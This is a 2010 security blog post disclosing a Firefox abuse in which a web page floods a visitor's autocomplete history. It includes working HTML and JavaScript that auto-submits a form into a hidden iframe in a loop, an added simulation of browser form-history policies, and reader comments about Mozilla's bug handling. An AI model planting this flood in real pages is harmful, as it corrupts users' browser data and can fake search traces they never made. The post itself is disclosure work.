Thursday, July 29, 2010

In Firefox we can’t read auto-complete, but we can write to it (a lot)!

This is not exactly security related, just a really really annoying abuse case that takes advantage of auto-complete functionality. During my research I tried dozens of different methods attempting to get Firefox to allow an arbitrary website to read the data, but to no avail. Clearly the Mozilla development team was on top of their game. However, just because we can’t read auto-complete data, doesn’t mean we can’t write to it... and en masse!

All you need is an iframe, a text field with arbitrary data, a form that posts to that iframe, and some JavaScript magic to automatically submit the form. Like so...

<script>
function fillAutoComp() {
  // random data, nothing important
  var num = Math.floor(Math.random() * 1000000);

  // set some arbitrary data to the text field
  document.getElementById('data').value = "Spoof-" + num;

  // submit the form, over and over and over again
  // (the form targets the iframe below, so the page itself never navigates away)
  setTimeout("document.getElementById('me').submit(); fillAutoComp();", 2);
}
</script>

<form id="me" method="post" action="/" target="my_iframe">
  <input type="text" name="data" id="data" value="" size="140">
  <input type="button" onclick="fillAutoComp()" value="Start">
</form>

<iframe name="my_iframe"></iframe>



Here's where it gets a little bit more interesting. Firefox saves 200 characters of auto-complete data per entry and allows 100 text fields per form. While this might add up, the amount of data is nowhere near enough to fill up a hard drive before a user leaves the page. However, Mozilla is working on a fix just the same. What you can do, though, is annoy users by littering well-known auto-complete entries, like "email," with loads of surrounding crap data. If one were so inclined, you could also make it look like someone searched for something, or has an alias, that they didn't type, by spoofing auto-complete data. You get the idea.

I attempted the same technique on Safari and Chrome. While it technically works, success was limited. In Safari, auto-complete data is site-specific. Chrome restricts the number of auto-complete entries. In Internet Explorer, no success.
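As an added illustration (not code from this post), here is a small JavaScript model of a browser form-history store under the three behaviours contrasted above: one global store with no entry cap (the Firefox behaviour described here), a cap on stored entries (Chrome), and per-site keying (Safari). The FormHistory class, its policy object and the host names are assumptions; only the 200-character and 100-field figures come from the post.

```javascript
// Added example: a toy model of a browser's form-history store, NOT code from the post.
// Only the 200-char and 100-field figures are from the post; everything else is assumed.
const MAX_VALUE_CHARS = 200;      // per-entry size the post quotes for Firefox
const MAX_FIELDS_PER_FORM = 100;  // per-form field count the post quotes for Firefox
class FormHistory {
  // policy.perSite: key entries by origin (Safari-like) or globally (Firefox/Chrome-like)
  // policy.maxEntries: cap on stored values per field name (Chrome-like), or Infinity
  constructor(policy) {
    this.policy = policy;
    this.entries = new Map(); // key -> Set of stored values
  }
  key(origin, fieldName) {
    return this.policy.perSite ? origin + '|' + fieldName : fieldName;
  }

  // Record one submission: an origin plus [fieldName, value] pairs. Returns how many
  // values were newly stored. Oversized values are truncated (assumption: a real
  // browser might instead reject them outright).
  recordSubmission(origin, fields) {
    let stored = 0;
    for (const [name, value] of fields.slice(0, MAX_FIELDS_PER_FORM)) {
      const k = this.key(origin, name);
      if (!this.entries.has(k)) this.entries.set(k, new Set());
      const values = this.entries.get(k);
      const v = String(value).slice(0, MAX_VALUE_CHARS);
      if (values.has(v) || values.size >= this.policy.maxEntries) continue;
      values.add(v);
      stored++;
    }
    return stored;
  }

  suggestions(origin, fieldName) {
    return [...(this.entries.get(this.key(origin, fieldName)) || [])];
  }
}

// Replay the post's flood: a hostile page posts "Spoof-<n>" into a field named "email"
// `submissions` times. Returns how many suggestions an unrelated site's own "email"
// field would then show the user (1 = only their real address survives).
function simulateFlood(policy, submissions) {
  const store = new FormHistory(policy);
  store.recordSubmission('https://bank.example', [['email', 'alice@example.com']]);
  for (let n = 0; n < submissions; n++) {
    store.recordSubmission('https://attacker.example', [['email', 'Spoof-' + n]]);
  }
  return store.suggestions('https://bank.example', 'email').length;
}
```

Under the global, uncapped policy the victim's "email" field ends up with every spoofed value as a suggestion; an entry cap bounds the damage, and per-site keying removes it entirely for other sites.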

2 comments:

Wladimir Palant said...

The bug you are linking to is marked as security-related - only a few people have access to it. Given that you already published this issue and severity is low anyway, could you suggest opening the bug?

Jeremiah Grossman said...

@Wladimir: Good point. I got an OK from Mozilla to post my details at BlackHat on this one. I didn't post it to Bugzilla though, they did. They'd have to open it up.